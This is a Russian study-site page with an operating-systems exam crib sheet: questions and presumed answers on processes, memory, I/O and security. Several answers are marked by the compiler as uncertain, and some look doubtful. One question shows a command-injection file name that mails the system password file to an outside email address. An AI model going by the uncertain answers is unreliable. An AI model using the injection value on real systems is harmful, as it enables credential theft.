Студопедия
Случайная страница | ТОМ-1 | ТОМ-2 | ТОМ-3
АрхитектураБиологияГеографияДругоеИностранные языки
ИнформатикаИсторияКультураЛитератураМатематика
МедицинаМеханикаОбразованиеОхрана трудаПедагогика
ПолитикаПравоПрограммированиеПсихологияРелигия
СоциологияСпортСтроительствоФизикаФилософия
ФинансыХимияЭкологияЭкономикаЭлектроника

Для сетевых операционных систем характерной является функция обеспечения



Вопрос

Предполагаемый ответ

Для сетевых операционных систем характерной является функция обеспечения...

взаимодействия связанных между собой компьютеров

Одна операционная система может поддерживать несколько...

операционных сред

Термин "маскирование" означает запрет отдельных...

сигналов прерывания

Для реализации синхронизации на уровне языка программирования используются высокоуровневые примитивы, названные...

мониторами (см. Таненбаум,стр. 141)

Свопингом сегментов называется перемещение...

сегментов между оперативной и внешней памятью

Идентификатор пользователя (?) представляет собой уникальное.... значение

символьное (вещественное, целое, составное???)

Мультитерминальный режим работы предполагает совмещение....

диалогового режима работы и режима мультипрограммирования

Последовательная (?) трансляция двух исходных программ (?) является

1. двумя одинаковыми процессами

2. двумя разными процессами

3. одной последовательной задачей

4. одним последовательным процессом

(что здесь понимается под процессом -

действие или результат?)

 

Идентификатор процесса является частью

(...два варианта...) процесса

описателя и контекста

В UNIX каждый новый процесс может быть образован (порожден) только...

одним из существующих процессов (?)

Основное различие между долгосрочным и краткосрочным планированием (диспетчеризацией) заключается в...

очередности выполнения

Приоритет, меняющийся во время исполнения процесса, называется...

динамическим

При совместном использовании процессами аппаратных и информационных ресурсов вычислительной системы возникает потребность в...

синхронизации

В UNIX сигналы можно рассматривать как простейшую форму взаимодействия между...

процессами

Область эффективного применения событийного программирования начинается там, где возникают...(два варианта)

неудобство использования графа переходов между состояниями;

трудности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы

(??)

 

Два параллельных процесса могут быть...

независимыми

Главной целью мультипрограммирования в системах пакетной обработки является...

минимизация простоев всех устройств компьютера

Учет участков свободной памяти с помощью связного списка свободных занятых (?!?) блоков позволяет...



выделять участок памяти произвольного размера

Использование виртуальной памяти в однопрограммном режиме приводит к....

процесса, если размер программы существенно больше объема доступной оперативной памяти

замедлению выполнения

 

 

Виртуальная память позволяет...(указать два ответа)

загружать программы, размер которых превышает объем доступной физической памяти;

загружать множество небольших программ, суммарный объем которых превышает объем доступной физической памяти;

 

Сегментная организация памяти... отдельно скомпилированных процедур (!)

состоит из

При страничной организации памяти таблица страниц может размещаться...

в оперативной памяти и на диске

Страничная организация предназначена для...

получения большего адресного пространства без приобретения дополнительно физической памяти

При страничном сбое (?!?) [ это прерывание ] и отсутствии свободных блоков физической памяти операционная система должна...

выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске, если она претерпела изменения

Полная (???) организация алгоритма LRU (Least Recently Used)...

возможна при условии построения таблицы страниц в виде бинарных деревьев (?)

Запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы получает... ввода-вывода

супервизор

Мыши (в качестве устройства-указателя) относятся к..... устройствам ввода-вывода

позиционируемым

Любые операции по управлению вводом-выводом объявляются...

привилегированными

Супервизор ввода-вывода инициирует операции ввода-вывода и в случае управления вводом-выводом с использованием прерываний предоставляет процессор...

диспетчеру задач

В режиме обмена с опросом готовности устройства ввода-вывода используется.....

центрального процессора

нерационально время

Понятие "виртуального устройства" по отношению к понятию "спулинга"....

является более широким

Каждый элемент таблицы оборудования условно называется....

UCB - (Unit Control Block)

Для увеличения скорости выполнения приложений при необходимости предлагается использовать..... ввод-вывод

 

 

асинхронный

Программа, расположенная в главной загрузочной записи, называется..... загрузчиком

внесистемным

Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной...

буферизации

Операционная система реального времени должна обеспечивать...

наследование приоритетов

К невыгружаемым относятся такие ресурсы, которые не могут быть

отобраны у процесса

Интерфейс прикладного программирования предназначен для использования прикладными программами....

системных ресурсов компьютера

По режиму обработки задач различают операционные системы, обеспечивающие..... режим (дать два ответа)

однопрограммный, мультипрограммный

Угроза "зомби" реализуется с помощью.... и заставляет компьютер выполнять приказания других лиц

вредоносных программ

Недостаток систем шифрования с ссекретным ключом состоит в том, что...

отправитель и получатель должны иметь общий секретный ключ

Объектами защиты в компьютерных системах могут быть...

программы

Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на....

руководителей подразделений

Защита зашифрованных паролей в UNIX взламывается путем...

шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле паролей

(алгоритм MD5)

Лазейки в программах создаются...

только для облегчения отладки программ

Программа, выполняющая копирование файла путем системного вызова (??) запрашивает у пользователя имена файла-источника и файла-приемника. злоумышленник ввел в качестве имен файлов следующие значения: "aaa" и "bbb"; mail goofinator@mail.ru < etc passwd". Какие действия выполнит система?

Скопирует файл aaa в bbb и отправит файл паролей адресату goofinator@mail.ru

 

P.S. Символ < в UNIX определяет ввод:

куда < откуда

etc - каталог системных файлов

; - разделяет команды

Наиболее популярное применение ботнетов

(сети зараженных компьютеров) - это...

рассылка коммерческого спама

Перезаписывающий вирус заражает исполняемую программу путем....

записи вируса на место кода программы

Обнаружить зашифрованный вирус можно...

по сигнатурам кода процедур расшифровки вируса (?)

 


Дата добавления: 2015-09-29; просмотров: 363 | Нарушение авторских прав




<== предыдущая лекция | следующая лекция ==>
Вопросы комплексного государственного экзамена по специальности «История» | 617472, Россия, Пермский край, Кунгурский район, с. Филипповка

mybiblioteka.su - 2015-2024 год. (0.012 сек.)